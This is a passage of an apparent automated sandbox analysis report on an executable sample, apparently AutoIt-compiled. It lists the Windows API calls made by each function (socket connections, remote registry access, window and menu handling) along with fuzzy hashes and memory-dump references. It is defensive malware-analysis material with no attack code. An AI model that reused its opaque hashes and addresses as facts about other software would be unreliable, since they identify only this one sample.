                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                                            • Instruction ID: 11459d939bc5473978f4f4877296b8434d72ce7869612e16e13a497a6441de96
                                                                            • Opcode Fuzzy Hash: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                                            • Instruction Fuzzy Hash: 4E31F971901509BFDF15AB94DC89AFEB7BCFF08300F10416AF601E2151EB749E8A9BA1
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB2E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB54
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0085DB57
                                                                            • SysAllocString.OLEAUT32(?), ref: 0085DB75
                                                                            • SysFreeString.OLEAUT32(?), ref: 0085DB7E
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0085DBA3
                                                                            • SysAllocString.OLEAUT32(?), ref: 0085DBB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: b04c5856d9a5c224f77525b529e765d76673b259c7410914ede61ff04945c41d
                                                                            • Instruction ID: 68bfb23319b0da0b466a8b88ccdb0925b5c5a193ea4f36756111e0b00358af9c
                                                                            • Opcode Fuzzy Hash: b04c5856d9a5c224f77525b529e765d76673b259c7410914ede61ff04945c41d
                                                                            • Instruction Fuzzy Hash: 3B218176600219AFEF20DFA8DC88CBB73ADFB09371B118526FE14DB251D6709C458765
                                                                            APIs
                                                                              • Part of subcall function 00877D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00877DB6
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008761C6
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008761D5
                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0087620E
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00876217
                                                                            • WSAGetLastError.WSOCK32 ref: 00876221
                                                                            • closesocket.WSOCK32(00000000), ref: 0087624A
                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00876263
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 910771015-0
                                                                            • Opcode ID: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                                            • Instruction ID: b728a0628da3978cd5133b5b8f81d6e97ac34da8a8d8265cf183412622125735
                                                                            • Opcode Fuzzy Hash: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                                            • Instruction Fuzzy Hash: E031A471600518ABEF10AF28CC85BBD7BA9FF45725F048069FD09E7296DB70EC149B62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: 08f09597f1bd5bc8afa8da2c1afdf39b2deba816902d9c31e0553ce9ed0240e8
                                                                            • Instruction ID: a31fc20360f5e9f8752b457b1079e87144b7f979c9a03dc33958dfa8659ae400
                                                                            • Opcode Fuzzy Hash: 08f09597f1bd5bc8afa8da2c1afdf39b2deba816902d9c31e0553ce9ed0240e8
                                                                            • Instruction Fuzzy Hash: E82149722041617AD620B638AC02EA773DCFF69355F144439FE45C7193FB549D89C396
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DC09
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DC2F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0085DC32
                                                                            • SysAllocString.OLEAUT32 ref: 0085DC53
                                                                            • SysFreeString.OLEAUT32 ref: 0085DC5C
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0085DC76
                                                                            • SysAllocString.OLEAUT32(?), ref: 0085DC84
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: f5a6d9065282b5fa253f43c3980d31ce711e8cbfa7813fef9c53ddbb5080372a
                                                                            • Instruction ID: 34b5f0973b087181566f0565e63ae8028a6d6b091f74ba82694d8fd138b2e4c1
                                                                            • Opcode Fuzzy Hash: f5a6d9065282b5fa253f43c3980d31ce711e8cbfa7813fef9c53ddbb5080372a
                                                                            • Instruction Fuzzy Hash: 91215675604218AF9B20DFACDC88DAB77ECFB09361B108166FE15CB261D674DC45CB64
                                                                            APIs
                                                                              • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                                              • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                                              • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00887632
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0088763F
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0088764A
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887659
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00887665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                                            • Instruction ID: c7d02d9d76ff4576afe97d17bbdb552f929edbd693254a6cb6576027ce211b8f
                                                                            • Opcode Fuzzy Hash: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                                            • Instruction Fuzzy Hash: AC1193B1110119BFEF159F64CC85EE77F6DFF087A8F114215BA04A21A0D6729C21DBA4
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 00829AE6
                                                                              • Part of subcall function 00823187: EncodePointer.KERNEL32(00000000), ref: 0082318A
                                                                              • Part of subcall function 00823187: __initp_misc_winsig.LIBCMT ref: 008231A5
                                                                              • Part of subcall function 00823187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00829EA0
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00829EB4
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00829EC7
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00829EDA
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00829EED
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00829F00
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00829F13
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00829F26
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00829F39
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00829F4C
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00829F5F
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00829F72
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00829F85
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00829F98
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00829FAB
                                                                              • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00829FBE
                                                                            • __mtinitlocks.LIBCMT ref: 00829AEB
                                                                            • __mtterm.LIBCMT ref: 00829AF4
                                                                              • Part of subcall function 00829B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00829AF9,00827CD0,008BA0B8,00000014), ref: 00829C56
                                                                              • Part of subcall function 00829B5C: _free.LIBCMT ref: 00829C5D
                                                                              • Part of subcall function 00829B5C: DeleteCriticalSection.KERNEL32(008BEC00,?,?,00829AF9,00827CD0,008BA0B8,00000014), ref: 00829C7F
                                                                            • __calloc_crt.LIBCMT ref: 00829B19
                                                                            • __initptd.LIBCMT ref: 00829B3B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00829B42
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            • Opcode ID: 00b37b8ffd8f7e563d55d23516a9f35d056ef4aa377750a1235e39de935dc293
                                                                            • Instruction ID: da28ae99770fb7b27e6d45832ab80ed556cb0b42b42533803e13935d2222ea2d
                                                                            • Opcode Fuzzy Hash: 00b37b8ffd8f7e563d55d23516a9f35d056ef4aa377750a1235e39de935dc293
                                                                            • Instruction Fuzzy Hash: 12F090325197315EE634777CBC0768A3B90FF02730F200A29F4E5D51D2EF2184C145A6
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00823F85), ref: 00824085
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0082408C
                                                                            • EncodePointer.KERNEL32(00000000), ref: 00824097
                                                                            • DecodePointer.KERNEL32(00823F85), ref: 008240B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                                            • Instruction ID: afa1cfba3adc661ba952514908b3b6e73d5a96f64be03f26da845918f7b633ac
                                                                            • Opcode Fuzzy Hash: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                                            • Instruction Fuzzy Hash: B9E0B670581310EFEB50AF66ED0DF453AB5F704742F18802AF211E12A1CBBA4645DB14
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                            • Instruction ID: 94b2b0012fcab326926fce53fcb0137c8b1b010e8d54a8e75899e93b37ddd14b
                                                                            • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                            • Instruction Fuzzy Hash: E1619F7050029A9BCF01EF68DC82AFE37A5FF15308F058525F859AB293EB34A855CB52
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0087FDAD,?,?), ref: 00880E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008802BD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008802FD
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00880320
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00880349
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0088038C
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00880399
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
                                                                            • Opcode ID: 067e0ef026057abc18fc7bfcdd1fd02d1736251d98626f597522befc3c768d41
                                                                            • Instruction ID: 212bb1e227fcbcdd03c1f2a110467639112b77de26045a6f356068f358bada15
                                                                            • Opcode Fuzzy Hash: 067e0ef026057abc18fc7bfcdd1fd02d1736251d98626f597522befc3c768d41
                                                                            • Instruction Fuzzy Hash: 69513731208204AFCB51EB68C885E6ABBE8FF85314F04491DF995C72A2DB31E949CF52
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 008857FB
                                                                            • GetMenuItemCount.USER32(00000000), ref: 00885832
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0088585A
                                                                            • GetMenuItemID.USER32(?,?), ref: 008858C9
                                                                            • GetSubMenu.USER32(?,?), ref: 008858D7
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00885928
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                            • String ID:
                                                                            • API String ID: 650687236-0
                                                                            • Opcode ID: c43936f780659906b17591fda6c57bb87458c2f18045b38feb708078156cc2b0
                                                                            • Instruction ID: 65b4d194dcc33464f2196413aff7430832e1c61f3ed30909752f9c25bec5e5da
                                                                            • Opcode Fuzzy Hash: c43936f780659906b17591fda6c57bb87458c2f18045b38feb708078156cc2b0
                                                                            • Instruction Fuzzy Hash: 19515C75A00615EFCF11EF68C8459AEBBB4FF48320F104066E951EB352DB34AE418B91
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0085EF06
                                                                            • VariantClear.OLEAUT32(00000013), ref: 0085EF78
                                                                            • VariantClear.OLEAUT32(00000000), ref: 0085EFD3
                                                                            • _memmove.LIBCMT ref: 0085EFFD
                                                                            • VariantClear.OLEAUT32(?), ref: 0085F04A
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0085F078
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                            • String ID:
                                                                            • API String ID: 1101466143-0
                                                                            • Opcode ID: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                                            • Instruction ID: 0bc2ebab6f0f7b1c0f833a27747e1099ae6cd9d172cb774d55cc941e51f6117c
                                                                            • Opcode Fuzzy Hash: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                                            • Instruction Fuzzy Hash: 34515D75A00209DFCB14CF58C884AAAB7B8FF4C314B15856AEE59DB342E734E915CB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00862258
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008622A3
                                                                            • IsMenu.USER32(00000000), ref: 008622C3
                                                                            • CreatePopupMenu.USER32 ref: 008622F7
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00862355
                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00862386
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                                            • Instruction ID: 90c38ce3a5f1f3bc100eb1106d5137f9a82e1b666139aa4afeb6bf7c998bc2b5
                                                                            • Opcode Fuzzy Hash: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                                            • Instruction Fuzzy Hash: 3F51BE70600A4ADBDF21CF68CA88BADBBF5FF05318F1141A9E811E73A1D7748944CB52
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0080179A
                                                                            • GetWindowRect.USER32(?,?), ref: 008017FE
                                                                            • ScreenToClient.USER32(?,?), ref: 0080181B
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0080182C
                                                                            • EndPaint.USER32(?,?), ref: 00801876
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 2a24087a1dd2605fde5bc3fba59dc4fe98198e950426791598faf6a2ffbe1034
                                                                            • Instruction ID: b1cfd3b51fec51467a5968471bfcf42e789d70fd9b259dd3f82f5db99520e13e
                                                                            • Opcode Fuzzy Hash: 2a24087a1dd2605fde5bc3fba59dc4fe98198e950426791598faf6a2ffbe1034
                                                                            • Instruction Fuzzy Hash: D8418D70100601AFDB10DF28CC88FA67BF8FB59764F044639FAA4C61A2D730A945DB62
                                                                            APIs
                                                                            • ShowWindow.USER32(008C57B0,00000000,00E25320,?,?,008C57B0,?,0088B5A8,?,?), ref: 0088B712
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 0088B736
                                                                            • ShowWindow.USER32(008C57B0,00000000,00E25320,?,?,008C57B0,?,0088B5A8,?,?), ref: 0088B796
                                                                            • ShowWindow.USER32(00000000,00000004,?,0088B5A8,?,?), ref: 0088B7A8
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0088B7CC
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0088B7EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
